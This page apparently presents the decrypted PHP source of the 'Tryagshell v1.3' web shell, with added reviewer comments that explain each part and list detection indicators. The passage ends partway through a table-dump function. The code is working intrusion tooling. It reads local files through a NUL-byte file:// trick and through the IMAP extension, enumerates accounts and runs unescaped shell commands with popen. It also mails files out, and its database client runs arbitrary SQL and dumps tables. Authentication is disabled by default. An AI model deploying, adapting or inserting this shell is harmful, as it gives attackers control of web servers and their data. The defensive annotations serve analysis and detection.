
Tryagshell v1.3 (decrypted)

28 Jan 2014

This is the decoded version of Tryagshell (apparently version 1.3).

You can see the encrypted version here: Tryagshell (encrypted)

Tryagshell v1.3 (decrypted) Source Code

   1 <?php
   2 /******************************************************************************************************/
   3 /*
   4 /*                                     #    #        #    #
   5 /*                                     #   #          #   #
   6 /*                                    #    #          #    #
   7 /*                                    #   
   8 ###   
   9 ###
  10 ###   
  11 ###   #
  12 /*                                   
  13 ###   
  14 ###  
  15 ###
  16 ###
  17 ###  
  18 ###   
  19 ###
  20 /*                                   
  21 ###   
  22 ###  
  23 ###
  24 ###
  25 ###  
  26 ###   
  27 ###
  28 /*                                   
  29 ###   
  30 ###   
  31 ###
  32 ###   
  33 ###   
  34 ###
  35 /*                                   
  36 ####   
  37 ###
  38 ###
  39 ###
  40 ###
  41 ###
  42 ###   
  43 ####
  44 /*                                   
  45 ###
  46 ###
  47 ###
  48 ###
  49 ###
  50 ###
  51 ###
  52 ###
  53 ###
  54 ###
  55 ###
  56 ###
  57 /*                                        
  58 ###
  59 ###
  60 ###
  61 ###
  62 ###
  63 ###
  64 ###
  65 /*                                 
  66 ###
  67 ###
  68 ###
  69 ### 
  70 ###
  71 ###
  72 ###
  73 ###
  74 ### 
  75 ###
  76 ###
  77 ####
  78 /*                                
  79 ####   
  80 ###  
  81 ###
  82 ###
  83 ###
  84 ###
  85 ###  
  86 ###   
  87 ####
  88 /*                                
  89 ####   
  90 ###  
  91 ###
  92 ###
  93 ###
  94 ###
  95 ###  
  96 ###   
  97 ####
  98 /*                                 
  99 ####   #  
 100 ###
 101 ###
 102 ###
 103 ###
 104 ###  #   
 105 ####
 106 /*                                 
 107 ####   
 108 ###  
 109 ###
 110 ###
 111 ###
 112 ###  
 113 ###   
 114 ####
 115 /*                                  
 116 ###    #   
 117 ###
 118 ###
 119 ###   #    
 120 ###
 121 /*                                   
 122 ###   #    
 123 ###
 124 ###   #    
 125 ###
 126 /*                                     
 127 ###                 
 128 ###
 129 /*
 130 /*
 131 /*
 132 /*  tryagshell.php - ?????? ?? ??? ??????????? ??? ????????? ????????? ??????? ?? ??????? ????? ???????
 133 /*  ?? ?????? ??????? ????? ?????? ?? ????? ?????: http://rst.void.ru
 134 /*  ??????: 1.3 (05.03.2006)
 135 /*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/
 136 /*  ????????? ????????????? ?? ?????? ? ????: blf, phoenix, virus, NorD ? ???? ?????? ?? RST/GHC.
 137 /*  ???? ? ??? ???? ?????-???? ???? ?? ?????? ???? ????? ??????? ??????? ???????? ? ?????? ?? ??????
 138 /*  ?? rst@void.ru. ??? ??????????? ????? ???????????.
 139 /*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/
 140 /*  (c)oded by 1dt.w0lf
 141 /*  RST/GHC http://rst.void.ru , http://ghc.ru
 142 /*  ANY MODIFIED REPUBLISHING IS RESTRICTED
 143 /******************************************************************************************************/
  // Reviewer note (defensive): operator-facing configuration of the shell.
  // The Russian half of the original comments was lost to an encoding error
  // ("?????"); the English text below is taken from the bilingual parts.
  // With $auth = 0 the HTTP Basic check at listing line 263 is skipped, so any
  // client that can reach the file gets the whole interface.
  // $name and $pass hold unsalted MD5 hex digests that are compared with
  // md5() of the Basic-auth user and password. The two digests are fixed strings
  // and can serve as content indicators when hunting for copies of this file.
  144 /* ~~~ Options  ~~~ */
  145 // Language
  146 // $language='ru' - russian
  147 // $language='eng' - english
  148 $language='eng';
  149 // Authentication
  150 // $auth = 1; - authentication on
  151 // $auth = 0; - authentication off
  152 $auth = 0;
  153 // Login & password for access
  154 // (CHANGE THIS!!!)
  155 // Login & password are stored as md5 digests; the author's comment gives the default as 'tryag' (not verified here)
  156 // Login & password crypted with md5, default is 'tryag'
  157 $name='7fea0708f4bc4266ab5efcd242028106'; // user login
  158 $pass='a66abb5684c45962d887564f08346e8d'; // user password
 159 /******************************************************************************************************/
  // Reviewer note (defensive): local-file read handler keyed on the POST field
  // 'Mohajer22'. It sits above the HTTP Basic check (listing line 263), so it is
  // reachable without credentials even when $auth = 1.
  // The field value is concatenated into a file:// URL, followed by a NUL byte and
  // a directory traversal that ends at this script's own path (__FILE__).
  // Presumably this is aimed at old PHP/cURL builds whose path-restriction check
  // could be confused by the embedded NUL; confirm against the PHP version in scope.
  // curl_exec() runs twice with no CURLOPT_RETURNTRANSFER set, so cURL writes the
  // fetched bytes straight into the response and var_dump() prints the return value.
  // Detection: POST bodies carrying 'Mohajer22'; PHP source that builds a file://
  // URL containing "\x00". Mitigation: a supported PHP release, and limiting the
  // protocols a cURL handle may use (CURLOPT_PROTOCOLS) in application code.
  160 if(empty($_POST['Mohajer22'])){
  161 } else {
  162 $m=$_POST['Mohajer22'];
  163 $ch =
  164 curl_init("file:///".$m."\x00/../../../../../../../../../../../../".__FILE__);
  165 curl_exec($ch);
  166 var_dump(curl_exec($ch));
  167 }
  // Reviewer note (defensive): file and directory access through the PHP IMAP
  // extension, driven by the POST fields 'string' and 'switch'. Like the handler
  // above it, this code runs before the HTTP Basic check at listing line 263.
  //   switch=file : 'string' is handed to imap_open() as a mailbox name and the
  //                 body of message 1 is echoed inside <pre> without HTML escaping.
  //   switch=dir  : /etc/passwd is opened as a mailbox and 'string' ("ref|pattern",
  //                 pattern defaulting to "*") is passed to imap_list(); each entry
  //                 is echoed back.
  // Presumably the IMAP library is used because its file access is not covered by
  // PHP's own path restrictions on the targeted versions; verify for the build in scope.
  // Detection: requests with both 'string' and 'switch' POST fields; a web-server
  // process opening local paths through the IMAP extension.
  // Mitigation: do not load php-imap on hosts that do not need it.
  168 $string = !empty($_POST['string']) ? $_POST['string'] : 0;
  169 $switch = !empty($_POST['switch']) ? $_POST['switch'] : 0;
  170 if ($string && $switch == "file") {
  171 $stream = imap_open($string, "", "");
  172 $str = imap_body($stream, 1);
  173 if (!empty($str))
  174 echo "<pre>".$str."</pre>";
  175 imap_close($stream);
  176 } elseif ($string && $switch == "dir") {
  177 $stream = imap_open("/etc/passwd", "", "");
  178 if ($stream == FALSE)
  179 die("Can't open imap stream");
  180 $string = explode("|",$string);
  181 if (count($string) > 1)
  182 $dir_list = imap_list($stream, trim($string[0]), trim($string[1]));
  183 else
  184 $dir_list = imap_list($stream, trim($string[0]), "*");
  185 echo "<pre>";
  186 for ($i = 0; $i < count($dir_list); $i++)
  187 echo "$dir_list[$i]"."<p>&nbsp;</p>" ;
  188 echo "</pre>";
  189 imap_close($stream);
  190 }
  // Reviewer note (defensive): "plugin" dispatcher selected by the POST field
  // 'plugin', with arguments in 'param1' / 'param2'. It also runs before the HTTP
  // Basic check at listing line 263.
  // $submit is never assigned in the visible code, so the condition only holds
  // where request variables are imported into globals (register_globals-era PHP)
  // - NOTE(review): confirm; $_POST[param1] likewise relies on bare-constant fallback.
  // Request values reach popen(), fopen()/fwrite() and copy() unfiltered.
  // Detection: POST field 'plugin' with one of the literal case labels below;
  // files named script*/cf* created in /tmp by the web-server user; /tmp/tmp.ghc.
  191 if ($_POST['plugin'] && ($submit == "Show")){
  192                                   $param1 = $_POST[param1];
  193                                 $param2 = $_POST[param2];
  194                                   switch($_POST['plugin']){
  // Account enumeration: walks uids 0..59999 through posix_getpwuid() and prints
  // every field of each hit, colon-separated.
  195                                  case("cat /etc/passwd"):
  196                                            for($uid=0;$uid<60000;$uid++){   //cat /etc/passwd
  197                                         $ara = posix_getpwuid($uid);
  198                                                 if (!empty($ara)) {
  199                                                   while (list ($key, $val) = each($ara)){
  200                                                     print "$val:";
  201                                                   }
  202                                                   print "<br>";
  203                                                 }
  204                                         }
  205                                 break;
  // Shell command built by appending param1 to "/bin/ls" with no escaping and
  // opened with popen().
  206                                         case ("/bin/ls"):
  207                                                 if($param1){$exec = "/bin/ls ". $param1;}
  208                                                 else{$exec = "/bin/ls";}
  209                                                 $fp = popen("$exec", "r");
  210                                                 print $fp;
  211                                                 pclose($fp);
  212                                         break;
  // Writes two temp files under /tmp: $cf (text that looks like a sendmail-style
  // mailer definition pointing at /bin/sh and $script) and $script (param1 preceded
  // by a self-cleanup command). Nothing in this case executes either file.
  213                                         case("tempnam"):
  214                                                 $cmd = $param1;
  215                                                 $script=tempnam("/tmp", "script");
  216                                                 $cf=tempnam("/tmp", "cf");
  217                                                 $fd = fopen($cf, "w");
  218                                                 fwrite($fd, "OQ/tmp Sparse=0 R$*" . chr(9) . "$#local $@ $1 $: $1 Mlocal, P=/bin/sh, A=sh $script");
  219                                                 fclose($fd);
  220                                                 $fd = fopen($script, "w");
  221                                                 fwrite($fd, "rm -f $script $cf; ");
  222                                                 fwrite($fd, $cmd);
  223                                                 fclose($fd);
  224                                                 break;
  // Copies the file named by param1 to param2 (default /tmp/tmp.ghc) and echoes
  // the copy line by line; the copy is left on disk.
  225                                                 case("/tmp"):
  226                                                 $target_file= $param1;
  227                                                         if (!$param2){$tmp_file="/tmp/tmp.ghc";}
  228                                                         else{$tmp_file = $param2;}
  229                                                 print copy($target_file, $tmp_file);
  230                                                 $handle = fopen ($tmp_file, "r");
  231                                                  while (!feof ($handle)) {
  232                                                   $buffer = fgets($handle, 4096);
  233                                              echo $buffer;
  234                                                   }
  235                                                 fclose ($handle);
  236                                          break;
  237                                                 }
  238                                                }
  // Reviewer note (defensive): runtime setup followed by the only access control
  // in the visible part of the file.
  // Error output is switched off and the execution time limit removed, so failures
  // leave no trace in the response and long-running requests are not cut short.
  // set_magic_quotes_runtime() and get_magic_quotes_gpc() exist only in legacy PHP
  // releases, which bounds the environments where this file runs as written.
  // The Basic-auth check compares md5() of the supplied user/password with $name
  // and $pass and is entered only when $auth == 1; the request handlers at listing
  // lines 160-238 have already executed by the time it is reached.
  // Detection: a 401 response carrying realm "tryagshell", or the literal
  // "tryagshell</a> : Access Denied" in a response body.
  239 error_reporting(0);
  240 set_magic_quotes_runtime(0);
  241 @set_time_limit(0);
  242 @ini_set('max_execution_time',0);
  243 @ini_set('output_buffering',0);
  244 $safe_mode = @ini_get('safe_mode');
  245 $version = "1.3";
  // Pre-4.1.0 PHP has no superglobals; alias the old HTTP_*_VARS arrays instead.
  246 if(version_compare(phpversion(), '4.1.0') == -1)
  247  {
  248  $_POST   = &$HTTP_POST_VARS;
  249  $_GET    = &$HTTP_GET_VARS;
  250  $_SERVER = &$HTTP_SERVER_VARS;
  251  }
  // Undo magic-quotes escaping so request values are used exactly as sent.
  252 if (@get_magic_quotes_gpc())
  253  {
  254  foreach ($_POST as $k=>$v)
  255   {
  256   $_POST[$k] = stripslashes($v);
  257   }
  258  foreach ($_SERVER as $k=>$v)
  259   {
  260   $_SERVER[$k] = stripslashes($v);
  261   }
  262  }
  263 if($auth == 1) {
  264 if (!isset($_SERVER['PHP_AUTH_USER']) || md5($_SERVER['PHP_AUTH_USER'])!==$name || md5($_SERVER['PHP_AUTH_PW'])!==$pass)
  265    {
  266    header('WWW-Authenticate: Basic realm="tryagshell"');
  267    header('HTTP/1.0 401 Unauthorized');
  268    exit("<b><a href=http://rst.void.ru>tryagshell</a> : Access Denied</b>");
  269    }
  270 }
 271 $head = '<!-- ??????????  ???? -->
 272 <html>
 273 <head>
 274 <title>MOHAJER22</title>
 275 <meta http-equiv="Content-Language" content="en-us">
 276 <meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
 277 <STYLE>
 278 tr {
 279 BORDER-RIGHT:  #aaaaaa 1px solid;
 280 BORDER-TOP:    #eeeeee 1px solid;
 281 BORDER-LEFT:   #eeeeee 1px solid;
 282 BORDER-BOTTOM: #aaaaaa 1px solid;
 283 BACKGROUND-COLOR: #000000;
 284 COLOR:red;
 285 }
 286 td {
 287 BORDER-RIGHT:  #aaaaaa 1px solid;
 288 BORDER-TOP:    #eeeeee 1px solid;
 289 BORDER-LEFT:   #eeeeee 1px solid;
 290 BORDER-BOTTOM: #aaaaaa 1px solid;
 291 BACKGROUND-COLOR:black;
 292 }
 293 .table1 {
 294 BORDER-RIGHT:  #cccccc 0px;
 295 BORDER-TOP:    #cccccc 0px;
 296 BORDER-LEFT:   #cccccc 0px;
 297 BORDER-BOTTOM: #cccccc 0px;
 298 BACKGROUND-COLOR: #000000;
 299 }
 300 .td1 {
 301 BORDER-RIGHT:  #cccccc 0px;
 302 BORDER-TOP:    #cccccc 0px;
 303 BORDER-LEFT:   #cccccc 0px;
 304 BORDER-BOTTOM: #cccccc 0px;
 305 font: 7pt Verdana;
 306 }
 307 .tr1 {
 308 BORDER-RIGHT:  #cccccc 0px;
 309 BORDER-TOP:    #cccccc 0px;
 310 BORDER-LEFT:   #cccccc 0px;
 311 BORDER-BOTTOM: #cccccc 0px;
 312 }
 313 table {
 314 BORDER-RIGHT:  #eeeeee 1px outset;
 315 BORDER-TOP:    #000000 1px outset;
 316 BORDER-LEFT:   #eeeeee 1px outset;
 317 BORDER-BOTTOM: #000000 1px outset;
 318 BACKGROUND-COLOR: #000000;
 319 }
 320 input {
 321 BORDER-RIGHT:  #ffffff 1px solid;
 322 BORDER-TOP:    #999999 1px solid;
 323 BORDER-LEFT:   #999999 1px solid;
 324 BORDER-BOTTOM: #ffffff 1px solid;
 325 BACKGROUND-COLOR: #000000;
 326 COLOR: #ffffff;
 327 font: Fixedsys bold;
 328 }
 329 select {
 330 BORDER-RIGHT:  #ffffff 1px solid;
 331 BORDER-TOP:    #999999 1px solid;
 332 BORDER-LEFT:   #999999 1px solid;
 333 BORDER-BOTTOM: #ffffff 1px solid;
 334 BACKGROUND-COLOR: #993333;
 335 COLOR: #ffffff;
 336 font: 8pt Verdana;
 337 }
 338 submit {
 339 BORDER-RIGHT:  buttonhighlight 2px outset;
 340 BORDER-TOP:    buttonhighlight 2px outset;
 341 BORDER-LEFT:   buttonhighlight 2px outset;
 342 BORDER-BOTTOM: buttonhighlight 2px outset;
 343 BACKGROUND-COLOR:black;
 344 COLOR: #ffffff;
 345 width: 40%;
 346 }
 347 textarea {
 348 BORDER-RIGHT:  #ffffff 1px solid;
 349 BORDER-TOP:    #999999 1px solid;
 350 BORDER-LEFT:   #999999 1px solid;
 351 BORDER-BOTTOM: #ffffff 1px solid;
 352 BACKGROUND-COLOR: #000000;
 353 COLOR: #ffffff;
 354 font: Fixedsys bold;
 355 }
 356 BODY {
 357 margin-top: 1px;
 358 margin-right: 1px;
 359 margin-bottom: 1px;
 360 margin-left: 1px;
 361 BACKGROUND-COLOR:black;
 362 COLOR: #ffffff;
 363 }
 364 A:link {COLOR:red; TEXT-DECORATION: none}
 365 A:visited { COLOR:red; TEXT-DECORATION: none}
 366 A:active {COLOR:red; TEXT-DECORATION: none}
 367 A:hover {color:red;TEXT-DECORATION: none}
 368 </STYLE>';
  // In-memory ZIP archive builder used by compress() for the 'zip' download option.
  // addFile() appends one deflate-compressed entry (local file header + data to
  // $datasec, central-directory record to $ctrl_dir); file() concatenates both
  // lists and the end-of-central-directory record into the final archive bytes.
  369 class zipfile
  370 {
  371     var $datasec      = array();
  372     var $ctrl_dir     = array();
  373     var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";
  374     var $old_offset   = 0;
  // Packs a Unix timestamp (0 = now) into the 32-bit DOS date/time layout;
  // dates before 1980 are clamped to 1980-01-01 00:00:00.
  375     function unix2DosTime($unixtime = 0) {
  376         $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime);
  377         if ($timearray['year'] < 1980) {
  378             $timearray['year']    = 1980;
  379             $timearray['mon']     = 1;
  380             $timearray['mday']    = 1;
  381             $timearray['hours']   = 0;
  382             $timearray['minutes'] = 0;
  383             $timearray['seconds'] = 0;
  384         }
  385         return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) |
  386                 ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1);
  387     }
  // Adds $data to the archive under $name (backslashes normalised to '/').
  // $time is a Unix timestamp for the entry, 0 meaning the current time.
  388     function addFile($data, $name, $time = 0)
  389     {
  390         $name     = str_replace('\\', '/', $name);
  391         $dtime    = dechex($this->unix2DosTime($time));
  392         $hexdtime = '\x' . $dtime[6] . $dtime[7]
  393                   . '\x' . $dtime[4] . $dtime[5]
  394                   . '\x' . $dtime[2] . $dtime[3]
  395                   . '\x' . $dtime[0] . $dtime[1];
  // NOTE(review): eval() turns the "\xNN" text into four raw bytes. The string is
  // assembled from dechex() output only, so no request data reaches it in this
  // method; the indexing assumes dechex() returned eight digits.
  396         eval('$hexdtime = "' . $hexdtime . '";');
  // Local file header: signature, version needed, flags, method 8 (deflate), time.
  397         $fr   = "\x50\x4b\x03\x04";
  398         $fr   .= "\x14\x00";
  399         $fr   .= "\x00\x00";
  400         $fr   .= "\x08\x00";
  401         $fr   .= $hexdtime;
  402         $unc_len = strlen($data);
  403         $crc     = crc32($data);
  404         $zdata   = gzcompress($data);
  // Drop the first 2 and last 4 bytes that gzcompress() wraps around the stream.
  405         $zdata   = substr(substr($zdata, 0, strlen($zdata) - 4), 2);
  406         $c_len   = strlen($zdata);
  407         $fr      .= pack('V', $crc);
  408         $fr      .= pack('V', $c_len);
  409         $fr      .= pack('V', $unc_len);
  410         $fr      .= pack('v', strlen($name));
  411         $fr      .= pack('v', 0);
  412         $fr      .= $name;
  413         $fr .= $zdata;
  414         $this -> datasec[] = $fr;
  // Matching central-directory record; it stores the offset of the local header
  // written above, then the running offset is advanced by that entry's size.
  415         $cdrec = "\x50\x4b\x01\x02";
  416         $cdrec .= "\x00\x00";
  417         $cdrec .= "\x14\x00";
  418         $cdrec .= "\x00\x00";
  419         $cdrec .= "\x08\x00";
  420         $cdrec .= $hexdtime;
  421         $cdrec .= pack('V', $crc);
  422         $cdrec .= pack('V', $c_len);
  423         $cdrec .= pack('V', $unc_len);
  424         $cdrec .= pack('v', strlen($name) );
  425         $cdrec .= pack('v', 0 );
  426         $cdrec .= pack('v', 0 );
  427         $cdrec .= pack('v', 0 );
  428         $cdrec .= pack('v', 0 );
  429         $cdrec .= pack('V', 32 );
  430         $cdrec .= pack('V', $this -> old_offset );
  431         $this -> old_offset += strlen($fr);
  432         $cdrec .= $name;
  433         $this -> ctrl_dir[] = $cdrec;
  434     }
  // Returns the complete archive as a binary string: all entries, the central
  // directory, then the end record with entry counts, directory size and offset.
  435     function file()
  436     {
  437         $data    = implode('', $this -> datasec);
  438         $ctrldir = implode('', $this -> ctrl_dir);
  439         return
  440             $data .
  441             $ctrldir .
  442             $this -> eof_ctrl_dir .
  443             pack('v', sizeof($this -> ctrl_dir)) .
  444             pack('v', sizeof($this -> ctrl_dir)) .
  445             pack('V', strlen($ctrldir)) .
  446             pack('V', strlen($data)) .
  447             "\x00\x00";
  448     }
  449 }
  // Compresses a download in place. $filename and $filedump are taken by reference:
  // the matching extension (.bz2, .gz, .zip) is appended to the name and the payload
  // is replaced by its compressed form. $compress selects 'bzip', 'gzip' or 'zip';
  // any other value, or a missing PHP extension, leaves the data untouched and
  // sets the MIME type to application/octet-stream.
  // Results are also reported through the globals $mime_type and $content_encoding
  // (the latter only for gzip), which the download handler turns into headers.
  450 function compress(&$filename,&$filedump,$compress)
  451  {
  452     global $content_encoding;
  453     global $mime_type;
  454     if ($compress == 'bzip' && @function_exists('bzcompress'))
  455      {
  456         $filename  .= '.bz2';
  457         $mime_type = 'application/x-bzip2';
  458         $filedump = bzcompress($filedump);
  459      }
  460      else if ($compress == 'gzip' && @function_exists('gzencode'))
  461      {
  462         $filename  .= '.gz';
  463         $content_encoding = 'x-gzip';
  464         $mime_type = 'application/x-gzip';
  465         $filedump = gzencode($filedump);
  466      }
  467      else if ($compress == 'zip' && @function_exists('gzcompress'))
  468      {
  469              $filename .= '.zip';
  470         $mime_type = 'application/zip';
  471         $zipfile = new zipfile();
  // The entry inside the archive keeps the original name (".zip" stripped again).
  472         $zipfile -> addFile($filedump, substr($filename, 0, -4));
  473         $filedump = $zipfile -> file();
  474      }
  475      else
  476      {
  477              $mime_type = 'application/octet-stream';
  478      }
  479  }
  // Sends $attach (array with 'type', 'name' and 'content' keys) to $to through
  // PHP mail(). Returns 1 when mail() accepted the message, otherwise 0.
  // The base64 payload is appended to the header string after a blank line and
  // the message-body argument is left empty.
  // Reviewer note (defensive): this is an outbound data path that uses the host's
  // own mail transport. $from and the attachment name go into the headers
  // unfiltered. Detection: mail submitted by the web-server user with an empty
  // body argument and base64 content following the headers; MTA logs for
  // unexpected recipients.
  480 function mailattach($to,$from,$subj,$attach)
  481  {
  482  $headers  = "From: $from\r\n";
  483  $headers .= "MIME-Version: 1.0\r\n";
  484  $headers .= "Content-Type: ".$attach['type'];
  485  $headers .= "; name=\"".$attach['name']."\"\r\n";
  486  $headers .= "Content-Transfer-Encoding: base64\r\n\r\n";
  487  $headers .= chunk_split(base64_encode($attach['content']))."\r\n";
  // '@' hides any mail() warning from the response.
  488  if(@mail($to,$subj,"",$headers)) { return 1; }
  489  return 0;
  490  }
  // Thin multi-driver database client. $db selects the backend ('MySQL', 'MSSQL',
  // 'PostgreSQL', 'Oracle'); host, port, user, pass and base are filled in by the
  // caller before connect(). Every driver call is prefixed with '@', so driver
  // warnings never reach the response.
  // Reviewer note (defensive): the db_query handler fills these properties from
  // POST fields, so the class lets a remote client run arbitrary SQL with whatever
  // credentials it supplies, from the web host's network position. The mysql_* and
  // mssql_* functions used here exist only in legacy PHP releases.
  // Detection: database logins originating from the web server with accounts the
  // application does not use; on MySQL, statements that begin with a comment
  // containing a NUL byte (see query()).
  491 class my_sql
  492  {
  493  var $host = 'localhost';
  494  var $port = '';
  495  var $user = '';
  496  var $pass = '';
  497  var $base = '';
  498  var $db   = '';
  499  var $connection;
  500  var $res;
  501  var $error;
  502  var $rows;
  503  var $columns;
  504  var $num_rows;
  505  var $num_fields;
  506  var $dump;
  // Opens the connection for the selected backend, filling in the default port
  // (3306 / 1433 / 5432) when none was given. Returns 1 on success, 0 when the
  // driver function is missing, the connection fails or $db is unknown.
  507  function connect()
  508   {
  509           switch($this->db)
  510      {
  511            case 'MySQL':
  512             if(empty($this->port)) { $this->port = '3306'; }
  513             if(!function_exists('mysql_connect')) return 0;
  514             $this->connection = @mysql_connect($this->host.':'.$this->port,$this->user,$this->pass);
  515             if(is_resource($this->connection)) return 1;
  516            break;
  517      case 'MSSQL':
  518       if(empty($this->port)) { $this->port = '1433'; }
  519             if(!function_exists('mssql_connect')) return 0;
  520             $this->connection = @mssql_connect($this->host.','.$this->port,$this->user,$this->pass);
  521       if($this->connection) return 1;
  522      break;
  523      case 'PostgreSQL':
  524       if(empty($this->port)) { $this->port = '5432'; }
  // Connection string is built by plain concatenation; values are not quoted-escaped.
  525       $str = "host='".$this->host."' port='".$this->port."' user='".$this->user."' password='".$this->pass."' dbname='".$this->base."'";
  526       if(!function_exists('pg_connect')) return 0;
  527       $this->connection = @pg_connect($str);
  528       if(is_resource($this->connection)) return 1;
  529      break;
  530      case 'Oracle':
  531       if(!function_exists('ocilogon')) return 0;
  532       $this->connection = @ocilogon($this->user, $this->pass, $this->base);
  533       if(is_resource($this->connection)) return 1;
  534      break;
  535      }
  536     return 0;
  537   }
  // Selects $base on MySQL/MSSQL. For PostgreSQL and Oracle it returns 1 without
  // doing anything (the database is named at connect time). Returns 0 on failure.
  538  function select_db()
  539   {
  540    switch($this->db)
  541     {
  542           case 'MySQL':
  543            if(@mysql_select_db($this->base,$this->connection)) return 1;
  544     break;
  545     case 'MSSQL':
  546            if(@mssql_select_db($this->base,$this->connection)) return 1;
  547     break;
  548     case 'PostgreSQL':
  549      return 1;
  550     break;
  551     case 'Oracle':
  552      return 1;
  553     break;
  554     }
  555    return 0;
  556   }
  // Runs $query and stores the driver result in $res. Return codes: 0 = error
  // (message in $error), 1 = a result set to fetch, 2 = statement without rows.
  // The Oracle branch assigns the codes the other way round (2 when the row count
  // is non-zero, 1 otherwise).
  557  function query($query)
  558   {
  559    $this->res=$this->error='';
  560    switch($this->db)
  561     {
  562           case 'MySQL':
  // Every MySQL statement is prefixed with the comment "/*<NUL>*/". The purpose is
  // not evident from this file - NOTE(review): possibly meant to interfere with
  // query logging or filtering; the prefix itself is a usable log indicator.
  563      if(false===($this->res=@mysql_query('/*'.chr(0).'*/'.$query,$this->connection)))
  564       {
  565       $this->error = @mysql_error($this->connection);
  566       return 0;
  567       }
  568      else if(is_resource($this->res)) { return 1; }
  569      return 2;
  570           break;
  571     case 'MSSQL':
  572      if(false===($this->res=@mssql_query($query,$this->connection)))
  573       {
  574       $this->error = 'Query error';
  575       return 0;
  576       }
  577       else if(@mssql_num_rows($this->res) > 0) { return 1; }
  578      return 2;
  579     break;
  580     case 'PostgreSQL':
  581      if(false===($this->res=@pg_query($this->connection,$query)))
  582       {
  583       $this->error = @pg_last_error($this->connection);
  584       return 0;
  585       }
  586       else if(@pg_num_rows($this->res) > 0) { return 1; }
  587      return 2;
  588     break;
  589     case 'Oracle':
  590      if(false===($this->res=@ociparse($this->connection,$query)))
  591       {
  592       $this->error = 'Query parse error';
  593       }
  594      else
  595       {
  596       if(@ociexecute($this->res))
  597        {
  598        if(@ocirowcount($this->res) != 0) return 2;
  599        return 1;
  600        }
  601       $error = @ocierror();
  602       $this->error=$error['message'];
  603       }
  604     break;
  605     }
  606   return 0;
  607   }
  // Fetches the whole result of the last query into $rows (associative arrays) and
  // sets $columns, $num_rows and $num_fields, then frees the driver result.
  // Returns 1 when at least one row was read, otherwise 0.
  // The fetch loops assign into $rows[] before testing for false, so the
  // terminating false is stored as a trailing element as well.
  608  function get_result()
  609   {
  610    $this->rows=array();
  611    $this->columns=array();
  612    $this->num_rows=$this->num_fields=0;
  613    switch($this->db)
  614     {
  615           case 'MySQL':
  616            $this->num_rows=@mysql_num_rows($this->res);
  617            $this->num_fields=@mysql_num_fields($this->res);
  618            while(false !== ($this->rows[] = @mysql_fetch_assoc($this->res)));
  619            @mysql_free_result($this->res);
  620            if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
  621     break;
  622     case 'MSSQL':
  623            $this->num_rows=@mssql_num_rows($this->res);
  624            $this->num_fields=@mssql_num_fields($this->res);
  625            while(false !== ($this->rows[] = @mssql_fetch_assoc($this->res)));
  626            @mssql_free_result($this->res);
  627            if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;};
  628     break;
  629     case 'PostgreSQL':
  630            $this->num_rows=@pg_num_rows($this->res);
  631            $this->num_fields=@pg_num_fields($this->res);
  632            while(false !== ($this->rows[] = @pg_fetch_assoc($this->res)));
  633            @pg_free_result($this->res);
  634            if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
  635     break;
  636     case 'Oracle':
  637      $this->num_fields=@ocinumcols($this->res);
  // No row-count call for Oracle here: rows are counted while fetching.
  638      while(false !== ($this->rows[] = @oci_fetch_assoc($this->res))) $this->num_rows++;
  639      @ocifreestatement($this->res);
  640      if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
  641     break;
  642     }
  643    return 0;
  644   }
  // Builds a text dump of $table in $this->dump: a header (creation time, database,
  // table), then for MySQL the SHOW CREATE TABLE output, then one INSERT statement
  // per row. Oracle only gets a placeholder. Returns 1 on success, 0 on an empty
  // table name, unknown backend or failed query.
  // $table is concatenated into the statements unescaped; row values are escaped
  // with mysql_real_escape_string() or addslashes() depending on the backend.
  // Reviewer note (defensive): this is the bulk-export path - a full-table SELECT
  // issued from the web server is the database-side trace.
  645  function dump($table)
  646   {
  647    if(empty($table)) return 0;
  648    $this->dump=array();
  649    $this->dump[0] = '
  650 ###';
  651    $this->dump[1] = '
  652 ### --------------------------------------- ';
  653    $this->dump[2] = '
  654 ###  Created: '.date ("d/m/Y H:i:s");
  655    $this->dump[3] = '
  656 ### Database: '.$this->base;
  657    $this->dump[4] = '
  658 ###    Table: '.$table;
  659    $this->dump[5] = '
  660 ### --------------------------------------- ';
  661    switch($this->db)
  662     {
  663           case 'MySQL':
  664            $this->dump[0] = '
  665 ### MySQL dump';
  666            if($this->query('/*'.chr(0).'*/ SHOW CREATE TABLE `'.$table.'`')!=1) return 0;
  667            if(!$this->get_result()) return 0;
  668            $this->dump[] = $this->rows[0]['Create Table'];
  669      $this->dump[] = '
  670 ### --------------------------------------- ';
  671            if($this->query('/*'.chr(0).'*/ SELECT * FROM `'.$table.'`')!=1) return 0;
  672            if(!$this->get_result()) return 0;
  673            for($i=0;$i<$this->num_rows;$i++)
  674             {
  675       foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @mysql_real_escape_string($v);}
  676             $this->dump[] = 'INSERT INTO `'.$table.'` (`'.@implode("`, `", $this->columns).'`) VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
  677             }
  678     break;
  679     case 'MSSQL':
  680      $this->dump[0] = '
  681 ### MSSQL dump';
  682      if($this->query('SELECT * FROM '.$table)!=1) return 0;
  683            if(!$this->get_result()) return 0;
  684            for($i=0;$i<$this->num_rows;$i++)
  685             {
  686       foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}
  687             $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
  688             }
  689     break;
  690     case 'PostgreSQL':
  691      $this->dump[0] = '
  692 ### PostgreSQL dump';
  693      if($this->query('SELECT * FROM '.$table)!=1) return 0;
  694            if(!$this->get_result()) return 0;
  695            for($i=0;$i<$this->num_rows;$i++)
  696             {
